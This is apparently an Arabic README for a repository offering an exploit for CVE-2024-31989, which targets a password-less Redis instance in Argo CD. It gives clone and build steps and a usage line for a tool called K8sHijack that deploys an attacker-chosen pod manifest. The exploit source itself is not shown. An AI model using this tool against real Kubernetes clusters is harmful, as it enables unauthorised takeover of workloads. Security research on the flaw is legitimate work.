
استغلال لـ CVE-2024-31989.
يحتوي هذا المستودع على استغلال لـ CVE-2024-31989 يستهدف مثيل Redis بدون كلمة مرور في Argo CD.
Argo CD هي أداة توصيل مستمرة (GitOps) تعريفية لتطبيقات Kubernetes. يستفيد هذا الاستغلال من ثغرة في Argo CD حيث يتم نشر مثيل Redis بدون كلمة مرور.
git clone https://github.com/vt0x78/CVE-2024-31989.git
cd CVE-2024-31989
go build -o <name>
أو قم فقط بتنزيل الملف الثنائي من الإصدارات.
./K8sHijack -key <path to key name> -pod <path to pod manifest to deploy>
للحصول على شرح مفصل لهذا الاستغلال وتأثيراته، يُرجى الرجوع إلى مقالتي CVE-2024-31989.